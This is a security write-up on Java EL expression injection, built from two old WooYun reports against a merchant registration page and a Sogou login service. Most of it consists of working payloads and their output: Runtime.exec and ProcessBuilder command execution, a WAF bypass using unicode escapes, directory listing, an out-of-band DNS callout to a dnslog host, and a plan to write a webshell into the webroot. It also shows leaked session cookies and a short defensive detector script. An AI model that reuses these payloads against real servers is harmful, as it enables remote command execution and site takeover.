JAVA WEB EL Expression Injection


  Reviewing 豬豬俠's old vulnerability reports, and summarising them along the way:

I. Introduction to EL expressions

  EL stands for Expression Language. Its main uses are:
  1. Retrieving data
    EL expressions are mainly used to replace scriptlet expressions in JSP pages, retrieving Java objects and data from the various web scopes (an object in a web scope, JavaBean properties, List collections, Map collections, arrays).
  2. Performing operations
    EL expressions can perform basic relational, logical and arithmetic operations inside a JSP page, so that simple logic can be done there, e.g. ${user==null}
  3. Accessing common web objects
    EL defines a set of implicit objects through which web developers can easily obtain references to commonly used web objects and read the data they hold.
  4. Calling Java methods
    EL allows users to develop custom EL functions so that methods of Java classes can be called from a JSP page through EL.

This section is copied; the full article is at: https://www.cnblogs.com/xdp-gacl/p/3938361.html

Detection method:

https://www.a.com/login?a=${10-9}

If the expression is evaluated, its result is echoed in the page; check the page source.

Exploitation:

${pageContext} corresponds to the pageContext object of the JSP page (note: it is the pageContext object itself that is retrieved).

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}   obtains the web application path

${header}  request header parameters

${applicationScope} obtains the webRoot

${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("命令").getInputStream())}  executes a command

Penetration approach: obtain the webroot path, then use exec to run an echo command that writes a one-line webshell.


WooYun case 1:

Details:

#1 Vulnerability description

EL expression syntax allows developers to define custom functions that call methods of Java classes

#2 Affected server

http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml

#3 Payload

Code:
groupName=1&papersType=${9999999-444}&papersValue=1&baseacct=1&retMsg=1&retCode=1

(screenshot: icbc1.jpg)

Proof of vulnerability:

#4 Bypassing the WAF

Code:
http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml
companyName=999&groupName=&papersType=${"a9999abbb".toString\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1

(screenshot: tostring.jpg)



#5 Command execution with echoed output

Code:
groupName=1&papersType=${%23a%3d\u0028new%20java.lang.ProcessBuilder\u0028new%20java.lang.String[]{\u0027/sbin/ifconfig\u0027,\u0027-a\u0027}\u0029\u0029.start\u0028\u0029,%23b%3d%23a.getInputStream\u0028\u0029,%23c%3dnew%**.**.**.**.InputStreamReader\u0028%23b\u0029,%23d%3dnew%**.**.**.**.BufferedReader\u0028%23c\u0029,%23e%3dnew%20char[50000],%23d.read\u0028%23e\u0029,%23ringzero%3d%23context.get\u0028\u0027com.opensymphony.xwork2.dispatcher.HttpServletResponse\u0027\u0029,%23ringzero.getWriter\u0028\u0029.println\u0028%23e\u0029,%23ringzero.getWriter\u0028\u0029.flush\u0028\u0029,%23ringzero.getWriter\u0028\u0029.close\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1



Code (URL-decoded form of the payload above):
${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'/sbin/ifconfig','-a'})).start(),#b=#a.getInputStream(),#c=new **.**.**.**.InputStreamReader(#b),#d=new **.**.**.**.BufferedReader(#c),#e=new char[50000],#d.read(#e),#ringzero=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#ringzero.getWriter().println(#e),#ringzero.getWriter().flush(),#ringzero.getWriter().close()}



Code (output returned in the response):
eth5      Link encap:Ethernet  HWaddr 00:50:56:97:7A:74  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5603928546 errors:0 dropped:0 overruns:0 frame:0
TX packets:8131434126 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:735168104896 (701110.9 Mb) TX bytes:11750604019014 (11206249.2 Mb)

lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:51371053 errors:0 dropped:0 overruns:0 frame:0
TX packets:51371053 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:25387430681 (24211.3 Mb) TX bytes:25387430681 (24211.3 Mb)



(screenshot: ifconfig.png)



#6 Directory listing

Code:
groupName=1&papersType=${new **.**.**.**.File(\u0027/\u0027).listFiles()[1]}&papersValue=1&baseacct=1&retMsg=1&retCode=1

 

Fix:

# Expressions must not be invokable from the client
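On the detection side, the case above shows the same probe arriving in three forms: plain ${...} (#3), parentheses written as the Java escapes \u0028 \u0029 to slip past the WAF (#4), and fully URL-encoded (#5). The following is an added example, not code from the original report or from WooYun: a small normaliser that undoes both URL encoding and \uXXXX escapes before matching, so all three forms are classified alike. The request lines are constructed samples, and the token list and path names are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines (not taken from the reports above) covering the
# three encodings seen in case 1: plain ${...}, Java \uXXXX escapes, URL encoding.
SAMPLE_REQUESTS = [
    "/login?service=${1000-900}",
    '/registerComUserForward.jhtml?papersType=${"a9999abbb".toString\\u0028\\u0029}',
    "/login?service=%24%7BpageContext.request.getClass%28%29%7D",
    "/login?service=https%3A%2F%2Fexample.test%2Fcallback",
    "/search?q=under%20%24100%20%7Bnew%7D",
]

_JAVA_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")
_EL_EXPR = re.compile(r"\$\{[^}]*\}")
# Tokens that mean the expression reaches objects or methods, not just arithmetic
# (assumed list; extend it with whatever your application exposes through EL).
_OBJECT_ACCESS = ("(", "pageContext", "applicationScope", "sessionScope", "requestScope",
                  "header", "getClass", "forName", "Runtime", "ProcessBuilder")


def normalize(raw: str) -> str:
    """Undo URL encoding and Java \\uXXXX escapes, repeating while the text keeps changing.

    The loop is bounded so nested encodings cannot make it run forever.
    """
    text = raw
    for _ in range(4):
        decoded = _JAVA_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def classify(raw: str) -> str:
    """Return 'clean', 'probe' (literal/arithmetic only) or 'object-access'."""
    exprs = _EL_EXPR.findall(normalize(raw))
    if not exprs:
        return "clean"
    if any(tok in expr for expr in exprs for tok in _OBJECT_ACCESS):
        return "object-access"
    return "probe"


def scan(requests):
    """Return (request, verdict) pairs for every request that is not clean."""
    results = [(r, classify(r)) for r in requests]
    return [(r, v) for r, v in results if v != "clean"]


if __name__ == "__main__":
    for req, verdict in scan(SAMPLE_REQUESTS):
        print(f"{verdict:14} {req}")
```

A WAF rule that only matches a literal "(" misses the #4 form; matching after normalisation is what closes that gap, and the "probe" verdict alone is already worth an alert because ${9999999-444} only evaluates when the sink is vulnerable.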

 

WooYun case 2:

A Sogou system has a remote expression injection vulnerability (command execution)
EL expression syntax allows developers to define custom functions that call methods of Java classes

Details:

#1 Vulnerable URL

Code:
https://auth.p4p.sogou.com/login?service=${1000-900}



Code:
https://auth.p4p.sogou.com/login?service=${pageContext}
action="/login?service=com.caucho.jsp.PageContextImpl@2aaf3a58" method="post">



#2 The result of the evaluated expression is returned in the page

(screenshot: expcetion.png)



Obtaining the web path

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

file:/opt/local/resin/



Code:
https://auth.p4p.sogou.com/login?service=${requestScope}
{javax.servlet.jsp.jstl.fmt.locale=zh_CN, org.springframework.validation.BindingResult.credentials=org.springframework.webflow.mvc.view.BindingModel: 0 errors, flashScope=map[[empty]], flowExecutionUrl=/login?service=%5BLjava.lang.String%3B%40660b2cde, warnCookieValue=false, javax.servlet.forward.servlet_path=/login, org.springframework.web.servlet.support.RequestContext.CONTEXT=Flow ApplicationContext [login]: startup date [Tue Apr 12 21:38:02 CST 2016]; parent: WebApplicationContext for namespace 'eunomia-servlet', org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, caucho.forward=true, javax.servlet.forward.request_uri=/login, javax.servlet.forward.query_string=service=${requestScope}, loginTicket=LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m, javax.servlet.forward.context_path=, phoneValidationModel=com.sogou.bizdev.eunomia.validation.phone.PhoneValidationModel@2da91c3c, org.springframework.web.servlet.FlashMapManager.OUTPUT_FLASH_MAP=[Attributes={}, targetRequestPath=null, targetRequestParams={}], flowRequestContext=[RequestControlContextImpl@4bab0382 externalContext = org.springframework.webflow.mvc.servlet.MvcExternalContext@4873729d, currentEvent = viewAcountLogin, requestScope = map[[empty]], attributes = map[[empty]], messageContext = [DefaultMessageContext@1369c694 sourceMessages = map[[null] -> list[[empty]]]], flowExecution = [FlowExecutionImpl@56c2881 flow = 'login', flowSessions = list[[FlowSessionImpl@7fd72fee flow = 'login', state = 'accountViewLoginForm', scope = map['phoneValidationModel' -> com.sogou.bizdev.eunomia.validation.phone.PhoneValidationModel@2da91c3c, 'loginTicket' -> 'LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m', 'service' -> ${requestScope}, 'credentials' -> [username: null], 'warnCookieValue' -> false, 'ticketGrantingTicketId' -> [null], 'viewScope' -> map['commandName' -> 'credentials']]]]]], 
viewScope=map['commandName' -> 'credentials'], javax.servlet.jsp.jstl.fmt.localizationContext=org.springframework.web.servlet.support.JstlUtils$SpringLocalizationContext@88bf3d4, org.springframework.web.servlet.DispatcherServlet.LOCALE_RESOLVER=org.springframework.web.servlet.i18n.CookieLocaleResolver@1c34e7ae, org.springframework.web.servlet.DispatcherServlet.CONTEXT=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, org.springframework.web.servlet.DispatcherServlet.THEME_RESOLVER=org.jasig.cas.services.web.ServiceThemeResolver@55565ef9, flowExecutionKey=e110s1, service=${requestScope}, commandName=credentials, encodingFilter.FILTERED=true, credentials=[username: null]}





Code:
https://auth.p4p.sogou.com/login?service=${header}
{Upgrade-Insecure-Requests=1, Accept-Language=zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4, Cookie=SUV=1446734204911570; IPLOC=CN4401; SUID=BA5782774FC80D0A00000000563B6987; pgv_pvi=3484909568; sct=4; LSTMV=703%2C260; LCLKINT=108193; CXID=5CE9FE68778002DCEC30C2A9412EBA10; GOTO=; ad=3wENElllll2Q7p51lllllVtpqM7lllllNcJUWlllll9lllllxTDll5@@@@@@@@@@; _euid=75841017-9d86-4069-9421-d077bd8489ef; JSESSIONID=abcN1iKReDhPacJcOLoqv; session_id_agent_crm=8a089ef7-44bf-493b-81bc-45a327cf03ec, Host=auth.p4p.sogou.com, PROXY_ADDR=10.149.29.104, Accept-Encoding=gzip, deflate, sdch, X-Real-IP=119.130.85.119, X-Forwarded-For=*******, User-Agent=, Connection=close, Accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8}

 

Proof of vulnerability:

EL expression reference

http://www.cnblogs.com/xdp-gacl/p/3938361.html

Exploitation method 1

Code:
${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\u0027ifconfig\u0027).getInputStream())}



#3 Command execution

${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("dig sougou.99fd5e.dnslog.info",null).getInputStream())}



CloudEYE:

Code (DNS log):
13-Apr-2016 18:42:50.858 queries: client 208.69.37.21#19674 (sougou.99fd5e.dnslog.info): query: sougou.99fd5e.dnslog.info IN A -E (128.199.200.236)
13-Apr-2016 18:42:53.876 queries: client 208.69.37.17#53756 (sougou.99fd5e.dnslog.info): query: sougou.99fd5e.dnslog.info IN A -E (128.199.200.236)





Read ${sessionScope} to get the echoed content of attribute a (the InputStream): a=java.io.BufferedInputStream@4d778271



Obtaining the WebROOT

https://auth.p4p.sogou.com/login?service=${applicationScope}

Code:
javax.servlet.context.tempdir=/opt/app/eunomia/WEB-INF/tmp,
org.springframework.web.context.WebApplicationContext.ROOT=Root WebApplicationContext



Then a command is used to write a JSP file into the directory /opt/app/eunomia/.

 

